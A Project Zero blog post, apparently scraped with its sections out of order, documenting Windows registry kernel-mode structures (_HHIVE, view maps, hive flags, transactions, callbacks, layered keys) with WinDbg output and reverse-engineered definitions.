PDB Structure name Description ✅ _CM_NOTIFY_BLOCK The first time RegNotifyChangeKeyValue or the underlying NtNotifyChangeMultipleKeys syscall is called on a given handle, a notify block structure is assigned to the corresponding key body object. This structure serves as the central control point for all notification requests made on that handle in the future. It also stores the configuration defined in the initial API call, which, once set, cannot be changed without closing and reopening the key. This is in line with the official MSDN documentation: "This function should not be called multiple times with the same value for the hKey but different values for the bWatchSubtree and dwNotifyFilter parameters. The function will succeed but the changes will be ignored. To change the watch parameters, you must first close the key handle by calling RegCloseKey, reopen the key handle by calling RegOpenKeyEx, and then call RegNotifyChangeKeyValue with the new parameters." The !reg notifylist command in WinDbg can list all active notify blocks in the system, allowing you to check which keys are currently being monitored for changes. ❌ Post block Each post block object corresponds to a single wait for changes to a given key. Many post block objects can be assigned to one notify block object at the same time. The network of relationships in this structure becomes even more complex when using the NtNotifyChangeMultipleKeys syscall with a non-empty SubordinateObjects argument, in which case two separate post blocks share a third data structure (the so-called post block union). However, the details of this topic are beyond the scope of this post. The WinDbg !reg postblocklist command allows you to see how many active post blocks are assigned to each process/thread, but unfortunately, it does not show any detailed information about their contents.Registry callbacks In PDB Structure name Description ✅ REG_*_INFORMATION These structures are used for supplying callbacks with precise information about operations performed on the registry, and are part of the documented Windows interface. Consequently, not only their definitions but also detailed descriptions of the meaning of each field are published directly by Microsoft. A complete list of these structures can be found on MSDN, e.g., on the EX_CALLBACK_FUNCTION callback function (wdm.h) page. However, I have found in my research that in addition to the official registry callback interface, there is also a less official extension that Microsoft uses internally in VRegDriver, the module that supports differencing hives. If a given client, instead of using the official CmRegisterCallbackEx function, calls the internal CmpRegisterCallbackInternal function with the fifth argument set to 1, this callback will be internally marked as "extended". Extended callbacks, in addition to the information provided by the standard structures, also receive a handful of additional information related to differencing hives and layered keys. At the time of writing, the differences occur in the structures representing the RegNtPreLoadKey, RegNtPreCreateKeyEx, RegNtPreOpenKeyEx actions and their "post" counterparts. ❌ Callback descriptor The structure represents a single registry callback registered through the CmRegisterCallback or CmRegisterCallbackEx API. Once allocated, it is attached to a double-linked list represented by the global CallbackListHead object. ❌ Object context descriptor A descriptor structure for a key body-specific context that can be assigned through the CmSetCallbackObjectContext API. This descriptor is then inserted into a linked list that starts at _CM_KEY_BODY.ContextListHead. ❌ Callback context An internal structure used in the CmpCallCallBacksEx function to store the current state during the callback invocation process. For example, it's used to invoke the appropriate "post" type callbacks in case of an error in one of the "pre" type callbacks. These objects are freed by the dedicated CmpFreeCallbackContext function, which additionally caches a certain number of allocations in the global CmpCallbackContextSList list. This allows future requests for objects of this type to be quickly fulfilled.Registry virtualization In PDB Structure name Description ❌ Replication stack A core task of registry virtualization is the replication of keys, which involves creating an identical copy of a given key structure. This occurs under the path HKU\_Classes\VirtualStore when an application, subject to virtualization, attempts to create a key in a location where it lacks proper permissions. The entire operation is coordinated by the CmpReplicateKeyToVirtual function and consists of two main stages. First, a "replication stack" object is created and initialized in the CmpBuildVirtualReplicationStack function. This object specifies the precise key structure to be created within the virtualization process. Second, the actual creation of these keys based on this object occurs within the CmpDoBuildVirtualStack function.Transactions In PDB Structure name Description ✅ _KTRANSACTION A structure corresponding to a KTM transaction object, which is created by the CreateTransaction function or its low-level equivalent NtCreateTransaction. ❌ Lightweight transaction object A direct counterpart of _KTRANSACTION, but for lightweight transactions, created by the NtCreateRegistryTransaction system call. It is very simple and only consists of a bitmask of the current transaction state, a push lock for synchronization, and a pointer to the corresponding _CM_TRANS object. ✅ _CM_KCB_UOW The structure represents a single, active transactional operation linked to a specific key. In some scenarios, one logical operation corresponds to one such object (e.g., the UoWSetSecurityDescriptor type). In other cases, multiple UoWs are created for a single operation (e.g., UoWAddThisKey assigned to a newly created key, and UoWAddChildKey assigned to its parent). This critical structure has multiple functions. The key ones are connecting to KCB intent locks and keeping any pending state related to a given operation, both before and during the transaction commit phase. ✅ _CM_UOW_* Auxiliary sub-structures of _CM_KCB_UOW, which store information about the temporary state of the registry associated with a specific type of transactional operation. Specifically, the four structures are: _CM_UOW_KEY_STATE_MODIFICATION, _CM_UOW_SET_SD_DATA, _CM_UOW_SET_VALUE_KEY_DATA and _CM_UOW_SET_VALUE_LIST_DATA. ✅ _CM_TRANS A descriptor of a specific registry transaction, usually associated with a particular hive. In special cases, if operations are performed on multiple hives within a single transaction, then multiple  _CM_TRANS objects may exist for it. Given the address of the _CM_TRANS object, it is possible to list all operations associated with this transaction in WinDbg using the !reg uowlist command. ✅ _CM_RM A descriptor of a specific resource manager. It only exists if the given hive has KTM transactions enabled, and never exists for app hives or hives loaded with the REG_HIVE_NO_RM flag. Think of this structure as being associated with one set of .blf / .regtrans-ms log files, which usually means one _CM_RM structure is assigned to one hive. The exception is system hives (e.g. SOFTWARE, SYSTEM etc.) which all share the same resource manager that exists under the CmRmSystem global variable. Given the address of a _CM_RM object in WinDbg, you can list all associated transactions using the !reg translist command. ✅ _CM_INTENT_LOCK This structure represents an intent lock, with two instances (KCBLock and KeyLock) residing in the KCB. Their primary function is to ensure key consistency by preventing the assignment of two different transactions that contain conflicting modifications of a key. Given the object's address, WinDbg's !reg ixlock command can display some details about it. ❌ Serialized log records KTM transacted registry operations are logged to .blf files on disk to enable consistent state restoration in case of unexpected shutdown during transaction commit. The CmAddLogForAction function serializes the _CM_KCB_UOW object into a flat buffer and writes it to the log file using the CLFS interface. While the _CM_KCB_UOW structure can be found in public symbols, their corresponding serialized representations cannot. Notably, there was an information disclosure vulnerability (CVE-2023-28271) that was directly related to these structures. ❌ Rollback packet When a client performs a non-transactional operation that modifies a key, and there's an active transaction associated with that key, the transaction must be rolled back before the operation can be executed to prevent an inconsistent state. This is achieved using a structure that contains a list of transactions to be rolled back. This structure is passed to the CmpAbortRollbackPacket function, which carries out the rollback. Although the official layout of this structure is unknown, in practice it is quite simple, consisting of three fields: the current capacity, the current fill level of the list, and a pointer to a dynamically allocated array of transactions.Differencing hives (VRegDriver) In PDB Structure name Description ❌ IOCTL input structures The VRegDriver module works by creating the \Device\VRegDriver device, and communicates with its clients by supporting nine distinct IOCTLs within the corresponding VrpIoctlDeviceDispatch handler function. These IOCTLs, exclusively accessible to administrator users, facilitate loading and unloading differencing hives, configuring registry redirections for specific containers, and a few other operations. Each IOCTL requires a specific input data structure, none of which are officially documented. Therefore, practical use of this interface necessitates reverse engineering the required structures to understand their initialization. An example of a reversed structure, corresponding to IOCTL 0x220008 and provisionally named VRP_LOAD_DIFFERENCING_HIVE_INPUT, was showcased in blog post #4. This enabled the creation of a proof-of-concept exploit for a differencing hive vulnerability (CVE-2023-36404), demonstrating the ability to load custom hives and, consequently, expose the flaw. ❌ Silo context This silo-specific context structure is set by the VRegDriver during silo initialization using the PsInsertPermanentSiloContext function. It is later retrieved by PsGetPermanentSiloContext and used during both IOCTL handling and path translation for containerized processes. A brief analysis suggests that it primarily contains the GUID of the associated silo, a push lock used for synchronization, and a user-configured list of namespaces for the given container, which is a set of source and target paths between which redirection should occur. ❌ Key context This structure stores the context specific to a particular key being subject to path translation within a silo. It is usually allocated for each key opened within the context of a containerized process, and assigned to its key body using the CmSetCallbackObjectContext API. It primarily stores the original path of the key before translation — as the client believes it has access to — and several other auxiliary fields. ❌ Callback context (open/create) The callback-specific context structure stores shared data between "pre" and "post" callbacks for a given operation. This context is generally accessed through the CallContext field within the REG_*_INFORMATION structure relevant to the specific operation. In practice, VRegDriver only has one instance of a special structure defined for this purpose, used when handling the RegNtPreCreateKeyEx/RegNtPreOpenKeyEx callbacks. It saves specific data (RootObject, CompleteName, RemainingName) before the open/create request, to restore their original values in the "post" callback. ❌ Extra parameter This structure also appears to be used for temporarily storing the original key path during translation. However, its scope encompasses the entire key creation/opening process, rather than just a single callback. This means it can store information across callbacks, even when symbolic links or write-through hives are encountered during path traversal, causing the CmpParseKey function to return STATUS_REPARSE or STATUS_REPARSE_GLOBAL and restart the path lookup process. Although the concept of a whole operation context seems broadly applicable, currently there is only one type of "extra parameter" being used, represented by the GUID VRP_ORIGINAL_KEY_NAME_PARAMETER_GUID {85b8669a-cfbb-4ac0-b689-6daabfe57722}.Layered keys In PDB Structure name Description ✅ _CM_KCB_LAYER_INFO This is likely the only structure related to layered keys whose definition is public. It is part of every KCB and contains information about the placement of the key in the global, "vertical" tree of layered key instances. In practice, this means that it stores a pointer to the KCB at one level lower (its parent, so to speak), and the head of a linked list with KCBs at one level higher (KCB.LayerHeight+1), if any exist. ❌ Key node stack A stack containing all instances of a given layered key, starting from its level all the way down to level zero (the base key). Each key in this structure is represented by a (Hive, KeyCell) pair. If the key actually exists at a given level (KeyCell ≠ -1, indicating a state other than Merge-Unbacked), it is also represented by a direct, resolved pointer to its _CM_KEY_NODE structure. Since Windows 10 introduced support for layered keys, many places in the code that previously identified a single key as _CM_KEY_NODE* now require passing the entire key node stack structure. This is because operations on layered keys usually require knowledge of the state of lower level keys (e.g. their layered semantics, subkeys, values), not just the key represented by the handle used by the caller. Places where the key node stack structure is used can be identified by calls to its related helper functions, such as those for initialization (CmpInitializeKeyNodeStack) and cleanup (CmpCleanupKeyNodeStack), as well as any others containing the string "KeyNodeStack". ❌ KCB stack This structure, analogous to the key node stack, represents keys using KCBs. Its use is most clearly revealed by references to the CmpStartKcbStack and CmpStartKcbStackForTopLayerKcb functions in code, though many other internal routines with "KcbStack" in their names also operate on it. Both the KCB stack and the key node stack share an optimization where the first two levels are stored inline, with additional levels allocated in kernel pools only when necessary. This is likely due to the fact that most systems, even those with layered keys, typically only use one level of nesting (two levels total). Thus, this optimization avoids costly memory allocation and deallocation in these common scenarios. ❌ Enum stack This data structure allows for the enumeration of subkeys within a given layered key. Its primary use is within the CmpEnumerateLayeredKey function, which serves as the handler for the NtEnumerateKey operation specifically for layered keys. At an even higher level, this corresponds to the RegEnumKeyExW API function. The complexity of this structure is evident by the fact that there are 19 internal helper functions, all starting with the name CmpKeyEnumStack, that operate on it. ❌ Enum resume context This data structure, directly tied to the subkey enumeration, primarily serves as an optimization mechanism. After executing a specific number (N) of enumeration steps, it stores the internal state of the enum stack. This allows subsequent requests for subkey N+1 to resume the enumeration process from the previous point, bypassing the need to repeat the initial steps. Linked to a specific handle, it is stored within _CM_KEY_BODY.EnumerationResumeContext. The KCB.SequenceNumber field, directly related to this structure, monitors whether a given key has significantly changed since a previous point in time. This enables the CmpKeyEnumStackVerifyResumeContext helper function to determine if the current registry state is consistent enough for the existing enumeration resume context to be used for further enumeration, or if the entire process needs to be restarted. ❌ Value enum stack This data structure, used to enumerate values for layered keys, is similarly complex as those used to list subkeys. The main function utilizing it is CmEnumerateValueFromLayeredKey. Additionally, there are 10 helper functions named CmpValueEnumStack[...] that operate on this structure. ❌ Sorted value enum stack The structure is similar to the standard value enum stack, but is used to iterate over the values of a given layered key while preserving lexicographical order. Helper functions from the CmpSortedValueEnumStack[...] family (9 in total) correspond to this structure. This functionality is used exclusively in the CmpGetValueCountForKeyNodeStack function, which is responsible for returning the number of values for a given key. The reason for the existence of this mechanism in parallel with the regular "value enum stack" is not entirely clear, but I suspect it serves as an optimization for value counting operations. This is supported by the fact that while layered keys first appeared in Windows 10 1607 (Redstone, build 14393), the sorted value enum stack was not introduced until the later version of Windows 10 1703 (Redstone 2, build 15063). In the first iteration of the layered key implementation, CmpGetValueCountForKeyNodeStack was implemented using the standard value enum stack. This lends credibility to the hypothesis that these mechanisms are functionally equivalent, but the "sorted" version is faster at counting unique values when direct access to them is not required. ❌ Subtree enumerator This structure enables the enumeration of both the direct subkeys of a layered key and all its deeper descendants. It is relatively complex, and its associated functions begin with CmpSubtreeEnumerator[...] (also 9 in total). This mechanism is primarily needed to implement the "rename" operation on layered keys. First, it allows verification that the caller has KEY_READ and DELETE permissions for all descendant keys in the subtree, and second, it enables setting the LayerSemantics value for these descendants to Supersede-Tree (0x3). ❌ Discard/replace context This data structure is employed during key deletion to ensure that KCB structures corresponding to higher-level Merge-Unbacked keys reliant on the deleted key are also marked as deleted. Subsequently, "fresh" KCB objects representing the non-existent key are inserted into the tree in their place. The two primary functions associated with this mechanism are CmpPrepareDiscardAndReplaceKcbAndUnbackedHigherLayers and CmpCommitDiscardAndReplaceKcbAndUnbackedHigherLayers.Conclusion The goal of this post was to provide a thorough overview of the structures used in the Configuration Manager subsystem in Windows, with particular emphasis on the most important and frequently used ones, i.e. those describing hives and keys. I wanted to share this knowledge because there are not many publicly available sources that accurately describe the registry's operation from the implementation side, especially relevant to the most recent code developments in Windows 10 and 11. I would also like to once again use this opportunity to appeal to Microsoft to make more information available through public PDB symbols – this would greatly facilitate the work of security researchers in the future. This post concludes the part of the series focusing solely on the inner workings of the registry. In the next, seventh installment, we will shift our perspective and examine the registry's role in the overall security of the system, with a deep focus on vulnerability research. Stay tuned!

https://googleprojectzero.blogspot.com/2025/04/the-windows-registry-adventure-6-kernel.html
The Windows Registry Adventure #6: Kernel-mode objects
2025-04-16T21:19:00Z | 1744838340

Posted by Mateusz Jurczyk, Google Project Zero Welcome back to the Windows Registry Adventure! In the previous installment of the series, we took a deep look into the internals of the regf hive format. Understanding this foundational aspect of the registry is crucial, as it illuminates the design principles behind the mechanism, as well as its inherent strengths and weaknesses. The data stored within the regf file represents the definitive state of the hive. Knowing how to parse this data is sufficient for handling static files encoded in this format, such as when writing a custom regf parser to inspect hives extracted from a hard drive. However, for those interested in how regf files are managed by Windows at runtime, rather than just their behavior in isolation, there's a whole other dimension to explore: the multitude of kernel-mode objects allocated and maintained throughout the lifecycle of an active hive. These auxiliary objects are essential for several reasons: To track all currently loaded hives, their properties (e.g., load flags), their memory mappings, and the relationships between them (especially for delta hives overlaid on top of each other).To synchronize access to keys and hives within the multithreaded Windows environment.To cache hive information for faster access compared to direct memory mapping lookups.To integrate the registry with the NT Object Manager and support standard operations (opening/closing handles, setting/querying security descriptors, enforcing access checks, etc.).To manage the state of pending transactions before they are fully committed to the underlying hive. To address these diverse requirements, the Windows kernel employs numerous interconnected structures. In this post, we will examine some of the most critical ones, how they function, and how they can be effectively enumerated and inspected using WinDbg. It's important to note that Microsoft provides official definitions only for some registry-related structures through PDB symbols for ntoskrnl.exe. In many cases, I had to reverse-engineer the relevant code to recover structure layouts, as well as infer the types and names of particular fields and enums. Throughout this write-up, I will clearly indicate whether each structure definition is official or reverse-engineered. If you spot any inaccuracies, please let me know. The definitions presented here are primarily derived from Windows Server 2019 with the March 2022 patches (kernel build 10.0.17763.2686), which was the kernel version used for the majority of my registry code analysis. However, over 99% of registry structure definitions appear to be identical between this version and the latest Windows 11, making the information directly applicable to the latest systems as well.Hive structures Given that hives are the most intricate type of registry object, it's not surprising that their kernel-mode descriptors are equally complex and lengthy. The primary hive descriptor structure in Windows, known as _CMHIVE, spans a substantial 0x12F8 bytes – exceeding 4 KiB, the standard memory page size on x86-family architectures. Contained within _CMHIVE, at offset 0, is another structure of type _HHIVE, which occupies 0x600 bytes, as depicted in the diagram below: This relationship mirrors that of other common Windows object pairs, such as _EPROCESS / _KPROCESS and _ETHREAD / _KTHREAD. Because _HHIVE is always allocated as a component of the larger _CMHIVE structure, their pointer types are effectively interchangeable. If you encounter a decompiled access using a _HHIVE* pointer that extends beyond the size of the structure, it almost certainly indicates a reference to a field within the encompassing _CMHIVE object. But why are two distinct structures dedicated to representing a single registry hive? While technically not required, this separation likely serves to delineate fields associated with different abstraction layers of the hive. Specifically: _HHIVE manages the low-level aspects of the hive, including the hive header, bins, and cells, as well as in-memory mappings and synchronization state with its on-disk counterpart (e.g., dirty sectors)._CMHIVE handles more abstract information about the hive, such as the cache of security descriptors, pointers to high-level kernel objects like the root Key Control Block (KCB), and the associated transaction resource manager (_CM_RM structure). The next subsections will provide a deeper look into the responsibilities and inner workings of these two structures._HHIVE structure overview The primary role of the _HHIVE structure is to manage the memory-related state of a hive. This allows higher-level registry code to perform operations such as allocating, freeing, and marking cells as "dirty" without needing to handle the low-level implementation details. The _HHIVE structure comprises 49 top-level members, most of which will be described in larger groups below: 0: kd> dt _HHIVE nt!_HHIVE    +0x000 Signature        : Uint4B    +0x008 GetCellRoutine   : Ptr64     _CELL_DATA*     +0x010 ReleaseCellRoutine : Ptr64     void     +0x018 Allocate         : Ptr64     void*     +0x020 Free             : Ptr64     void     +0x028 FileWrite        : Ptr64     long     +0x030 FileRead         : Ptr64     long     +0x038 HiveLoadFailure  : Ptr64 Void    +0x040 BaseBlock        : Ptr64 _HBASE_BLOCK    +0x048 FlusherLock      : _CMSI_RW_LOCK    +0x050 WriterLock       : _CMSI_RW_LOCK    +0x058 DirtyVector      : _RTL_BITMAP    +0x068 DirtyCount       : Uint4B    +0x06c DirtyAlloc       : Uint4B    +0x070 UnreconciledVector : _RTL_BITMAP    +0x080 UnreconciledCount : Uint4B    +0x084 BaseBlockAlloc   : Uint4B    +0x088 Cluster          : Uint4B    +0x08c Flat             : Pos 0, 1 Bit    +0x08c ReadOnly         : Pos 1, 1 Bit    +0x08c Reserved         : Pos 2, 6 Bits    +0x08d DirtyFlag        : UChar    +0x090 HvBinHeadersUse  : Uint4B    +0x094 HvFreeCellsUse   : Uint4B    +0x098 HvUsedCellsUse   : Uint4B    +0x09c CmUsedCellsUse   : Uint4B    +0x0a0 HiveFlags        : Uint4B    +0x0a4 CurrentLog       : Uint4B    +0x0a8 CurrentLogSequence : Uint4B    +0x0ac CurrentLogMinimumSequence : Uint4B    +0x0b0 CurrentLogOffset : Uint4B    +0x0b4 MinimumLogSequence : Uint4B    +0x0b8 LogFileSizeCap   : Uint4B    +0x0bc LogDataPresent   : [2] UChar    +0x0be PrimaryFileValid : UChar    +0x0bf BaseBlockDirty   : UChar    +0x0c0 LastLogSwapTime  : _LARGE_INTEGER    +0x0c8 FirstLogFile     : Pos 0, 3 Bits    +0x0c8 SecondLogFile    : Pos 3, 3 Bits    +0x0c8 HeaderRecovered  : Pos 6, 1 Bit    +0x0c8 LegacyRecoveryIndicated : Pos 7, 1 Bit    +0x0c8 RecoveryInformationReserved : Pos 8, 8 Bits    +0x0c8 RecoveryInformation : Uint2B    +0x0ca LogEntriesRecovered : [2] UChar    +0x0cc RefreshCount     : Uint4B    +0x0d0 StorageTypeCount : Uint4B    +0x0d4 Version          : Uint4B    +0x0d8 ViewMap          : _HVP_VIEW_MAP    +0x110 Storage          : [2] _DUALSignature Equal to 0xBEE0BEE0, it is a unique signature of the _HHIVE / _CMHIVE structures. It may be useful in digital forensics for identifying these structures in raw memory dumps, and is yet another reference to bees in the Windows registry implementation.Function pointers Next up, there are six function pointers, initialized in HvHiveStartFileBacked and HvHiveStartMemoryBacked, and pointing at internal kernel handlers for the following operations: Pointer name Pointer value Operation GetCellRoutine HvpGetCellPaged or HvpGetCellFlat Translate cell index to virtual address ReleaseCellRoutine HvpReleaseCellPaged or HvpReleaseCellFlat Release previously translated cell index Allocate CmpAllocate Allocate kernel memory within global registry quota Free CmpFree Free kernel memory within global registry quota FileWrite CmpFileWrite Write data to hive file FileRead CmpFileRead Read data from hive file As we can see, these functions provide the basic functionality of operating on kernel memory, cell indexes, and the hive file. In my opinion, the most important of them is GetCellRoutine, whose typical destination, HvpGetCellPaged, performs the cell map walk in order to translate a cell index into the corresponding address within the hive mapping. It is natural to think that these function pointers could prove useful for exploitation if an attacker managed to corrupt them through a buffer overflow or a use-after-free condition. That was indeed the case in Windows 10 and earlier, but in Windows 11, these calls are now de-virtualized, and most call sites reference one of HvpGetCellPaged / HvpGetCellFlat and HvpReleaseCellPaged / HvpReleaseCellFlat directly, without referring to the pointers. This is great for security, as it completely eliminates the usefulness of those fields in any offensive scenarios. Here's an example of a GetCellRoutine call in Windows 10, disassembled in IDA Pro: And the same call in Windows 11: Hive load failure information This is a pointer to a public _HIVE_LOAD_FAILURE structure, which is passed as the first argument to the SetFailureLocation function every time an error occurs while loading a hive. It can be helpful in tracking which validity checks have failed for a given hive, without having to trace the entire loading process.Base block A pointer to a copy of the hive header, represented by the _HBASE_BLOCK structure.Synchronization locks There are two locks with the following purpose:FlusherLock – synchronizes access to the hive between clients changing data inside cells and the flusher thread;WriterLock – synchronizes access to the hive between writers that modify the bin/cell layout. They are officially of type _CMSI_RW_LOCK, but they boil down to _EX_PUSH_LOCK, and they are used with standard kernel APIs such as ExAcquirePushLockSharedEx.Dirty blocks information Between offsets 0x58 and 0x84, _HHIVE stores several data structures representing the state of synchronization between the in-memory and on-disk instances of the hive.Hive flags First of all, there are two flags at offset 0x8C that indicate if the hive mapping is flat and if the hive is read-only. Secondly, there is a 32-bit HiveFlags member that stores further flags which aren't (as far as I know) included in any public Windows symbols. I have managed to reverse-engineer and infer the meaning of the constants I have observed, resulting in the following enum: enum _HV_HIVE_FLAGS {   HIVE_VOLATILE                      = 0x1,   HIVE_NOLAZYFLUSH                   = 0x2,   HIVE_PRELOADED                     = 0x10,   HIVE_IS_UNLOADING                  = 0x20,   HIVE_COMPLETE_UNLOAD_STARTED       = 0x40,   HIVE_ALL_REFS_DROPPED              = 0x80,   HIVE_ON_PRELOADED_LIST             = 0x400,   HIVE_FILE_READ_ONLY                = 0x8000,   HIVE_SECTION_BACKED                = 0x20000,   HIVE_DIFFERENCING                  = 0x80000,   HIVE_IMMUTABLE                     = 0x100000,   HIVE_FILE_PAGES_MUST_BE_KEPT_LOCAL = 0x800000, }; Below is a one-liner explanation of each flag:HIVE_VOLATILE: the hive exists in memory only; set, e.g., for \Registry and \Registry\Machine\HARDWARE.HIVE_NOLAZYFLUSH: changes to the hive aren't automatically flushed to disk and require a manual flush; set, e.g., for \Registry\Machine\SAM.HIVE_PRELOADED: the hive is one of the default, system ones; set, e.g., for \Registry\Machine\SOFTWARE, \Registry\Machine\SYSTEM, etc.HIVE_IS_UNLOADING: the hive is currently being loaded or unloaded in another thread and shouldn't be accessed before the operation is complete.HIVE_COMPLETE_UNLOAD_STARTED: the unloading process of the hive has started in CmpCompleteUnloadKey.HIVE_ALL_REFS_DROPPED: all references to the hive through KCBs have been dropped.HIVE_ON_PRELOADED_LIST: the hive is linked into a linked-list via the PreloadedHiveList field.HIVE_FILE_READ_ONLY: the underlying hive file is read-only and shouldn't be modified; indicates that the hive was loaded with the REG_OPEN_READ_ONLY flag set.HIVE_SECTION_BACKED: the hive is mapped in memory using section views.HIVE_DIFFERENCING: the hive is a differencing one (version 1.6, loaded under \Registry\WC).HIVE_IMMUTABLE: the hive is immutable and cannot be modified; indicates that it was loaded with the REG_IMMUTABLE flag set.HIVE_FILE_PAGES_MUST_BE_KEPT_LOCAL: the kernel always maintains a local copy of every page of the hive, either by locking it in physical memory or creating a private copy through the CoW mechanism.Log file information Between offsets 0xA4 to 0xCC, there are a number of fields having to do with log file management, i.e. the .LOG1/.LOG2 files accompanying the main hive file on disk.Hive version The Version field stores the minor version of the hive, which should theoretically be an integer between 3–6. However, as mentioned in the previous blog post, it is possible to set it to an arbitrary 32-bit value either by specifying a major version equal to 0 and any desired minor version, or by enticing the kernel to recover the hive header from a log file, and abusing the fact that the HvAnalyzeLogFiles function is more permissive than HvpGetHiveHeader. Nevertheless, I haven't found any security implications of this behavior.View map The view map holds all the essential information about how the hive is mapped in memory. The specific implementation of registry memory management has evolved considerably over the years, with its details changing between consecutive system versions. In the latest ones, the view map is represented by the top-level _HVP_VIEW_MAP public structure: 0: kd> dt _HVP_VIEW_MAP nt!_HVP_VIEW_MAP    +0x000 SectionReference : Ptr64 Void    +0x008 StorageEndFileOffset : Int8B    +0x010 SectionEndFileOffset : Int8B    +0x018 ProcessTuple     : Ptr64 _CMSI_PROCESS_TUPLE    +0x020 Flags            : Uint4B    +0x028 ViewTree         : _RTL_RB_TREE The semantics of its respective fields are as follows: SectionReference: Contains a kernel-mode handle to a section object corresponding to the hive file, created via ZwCreateSection in CmSiCreateSectionForFile.StorageEndFileOffset: Stores the maximum size of the hive that can be represented with file-backed sections at any given time. Initially set to the size of the loaded hive, it can dynamically increase or decrease at runtime for mutable (normal) hives.SectionEndFileOffset: Represents the size of the hive file section at the time of loading. It is never modified past the first initialization in HvpViewMapStart, and seems to be mostly used as a safeguard against extending an immutable hive file beyond its original size.ProcessTuple: A structure of type _CMSI_PROCESS_TUPLE, it identifies the host process of the hive's section views. This field currently always points to the global CmpRegistryProcess object, which corresponds to the dedicated "Registry" process that hosts all hive mappings in the system. However, this field could enable a more fine-grained separation of hive mappings across multiple processes, should Microsoft choose to implement such a feature.Flags: Represents a set of memory management flags relevant to the entire hive. These flags are not publicly documented; however, through reverse engineering, I have determined their purpose to be as follows:VIEW_MAP_HIVE_FILE_IMMUTABLE (0x1): Indicates that the hive has been loaded as immutable, meaning no data is ever saved back to the underlying hive file.VIEW_MAP_MUST_BE_KEPT_LOCAL (0x2): Indicates that all of the hive data must be persistently stored in memory, and not just accessible through file-backed sections. This is likely to protect against double-fetch conditions involving hives loaded from remote network shares.VIEW_MAP_CONTAINS_LOCKED_PAGES (0x4): Indicates that some of the hive's pages are currently locked in physical memory using ZwLockVirtualMemory.ViewTree: This is the root of a view tree structure, which contains the descriptors of each continuous section view mapped in memory. Overall, the implementation of low-level hive memory management in Windows is more complex than might initially seem necessary. This complexity arises from the kernel's need to gracefully handle a variety of corner cases and interactions. For example, hives may be loaded as immutable, which indicates that the hive may be operated on in memory, but changes must not be flushed to disk. Simultaneously, the system must support recovering data from .LOG files, including the possibility of extending the hive beyond its original on-disk length. At runtime, it must also be possible to efficiently modify the registry data, as well as shrink and extend it on demand. To further complicate matters, Windows enforces different rules for locking hive pages in memory depending on the backing volume of the file, carefully balancing optimal memory usage and system security guarantees. These and many other factors collectively contribute to the complexity of hive memory management. To better understand how the view tree is organized, let's first analyze the general logic of the hive mapping code.The hive mapping logic The main kernel function responsible for mapping a hive in memory is HvLoadHive. It implements the overall logic and coordinates various sub-routines responsible for performing more specialized tasks, in the following order: Header Validation: The kernel reads and inspects the hive's header to ascertain its integrity, ensuring that the hive has not been tampered with or corrupted. Relevant function: HvpGetHiveHeader.Log Analysis: The kernel processes the hive's transaction logs, scrutinising them to identify any pending changes or inconsistencies that necessitate recovery procedures. Relevant function: HvAnalyzeLogFiles.Initial Section Mapping: A section object is created based on the hive file, and further segmented into multiple views, each aligned to 4 KiB boundaries and capped at 2 MiB. At this point, the kernel prioritizes the creation of an initial mapping without focusing on the granular layout of individual bins within the hive. Relevant function: HvpViewMapStart.Cell Map Initialization: The cell map, a component that translates cell indexes to memory address, is initialized. Its entries are configured to point to the newly created views. Relevant function: HvpMapHiveImageFromViewMap.Log Recovery (if required): If the preceding log analysis reveals the need for data recovery, the kernel attempts to restore data integrity. This is the earliest point at which the newly created memory mappings may already be modified and marked as "dirty", indicating that their contents have been altered and require synchronisation with the on-disk representation. Relevant function: HvpPerformLogFileRecovery.Bin Mapping: In this final stage, the kernel establishes definitive memory mappings for each bin within the hive, ensuring that each bin occupies a contiguous region of memory. This process may necessitate creating new views, eliminating existing ones, or adjusting their boundaries to accommodate the specific arrangement of bins. Relevant function: HvpRemapAndEnlistHiveBins. Now that we understand the primary components of the loading process, we can examine the internal structure of the section view tree in more detail.The view tree Let's consider an example hive consisting of three bins of sizes 256 KiB, 2 MiB and 128 KiB, respectively. After step 3 ("Initial Section Mapping"), the section views created by the kernel are as follows: As we can see, at this point, the kernel doesn't concern itself with bin boundaries or continuity: all it needs to achieve is to make every page of the hive accessible through a section view for log recovery purposes. In simple terms, the way that HvpViewMapStart (or more specifically, HvpViewMapCreateViewsForRegion) works is it creates as many 2 MiB views as necessary, followed by one last view that covers the remaining part of the file. So in our example, we have the first view that covers bin 1 and the beginning of bin 2, and the second view that covers the trailing part of bin 2 and the entire bin 3. It's important to note that memory continuity is only guaranteed within the scope of a single view, and views 1 and 2 may be mapped at completely different locations in the virtual address space. Later in step 6, the system ensures that every bin is mapped as a contiguous block of memory before handing off the hive to the client. This is done by iterating through all the bins, and for every bin that spans more than one view in the current view map, the following operations are performed: If the start and/or the end of the bin fall into the middle of existing views, these views are truncated from either side. Furthermore, if there are any views that are fully covered by the bin, they are freed and removed from the tree.A new, dedicated section view is created for the bin and inserted into the view tree. In our hypothetical scenario, the resulting view layout would be as follows: As we can see, the kernel shrinks views 1 and 2, and creates a new view 3 corresponding to bin 2 to fill the gap. The final layout of the binary tree of section view descriptors is illustrated below: Knowing this, we can finally examine the structure of a single view tree entry. It is not included in the public symbols, but I named it _HVP_VIEW. My reverse-engineered version of its definition is as follows: struct _HVP_VIEW {   RTL_BALANCED_NODE Node;   LARGE_INTEGER ViewStartOffset;   LARGE_INTEGER ViewEndOffset;   SSIZE_T ValidStartOffset;   SSIZE_T ValidEndOffset;   PBYTE MappingAddress;   SIZE_T LockedPageCount;   _HVP_VIEW_PAGE_FLAGS PageFlags[]; }; The role of each particular field is documented below: Node: This is the structure used to link all of the entries into a single red-black tree, passed to helper kernel functions such as RtlRbInsertNodeEx and RtlRbRemoveNode.ViewStartOffset and ViewEndOffset: This offset pair specifies the overall byte range covered by the underlying section view object in the hive file. Their difference corresponds to the cumulative length of the red and green boxes in a single row in the diagrams above.ValidStartOffset and ValidEndOffset: This offset pair specifies the valid range of the hive accessible through this view, i.e. the green rectangles in the diagrams. It must always be a subset of the [ViewStartOffset, ViewEndOffset] range, and may dynamically change while re-mapping bins (as just shown in this section), as well as when shrinking and extending the hive.MappingAddress: This is the base address of the section view mapping in memory, as returned by ZwMapViewOfSection. It is valid in the context of the process specified by _HVP_VIEW_MAP.ProcessTuple (currently always the "Registry" process). It covers the entire range between [ViewStartOffset, ViewEndOffset], but only pages between [ValidStartOffset, ValidEndOffset] are accessible, and the rest of the section view is marked as PAGE_NOACCESS.LockedPageCount: Specifies the number of pages locked in virtual memory using ZwLockVirtualMemory within this view.PageFlags: A variable-length array that specifies a set of flags for each memory page in the [ViewStartOffset, ViewEndOffset] range. I haven't found any (un)official sources documenting the set of supported page flags, 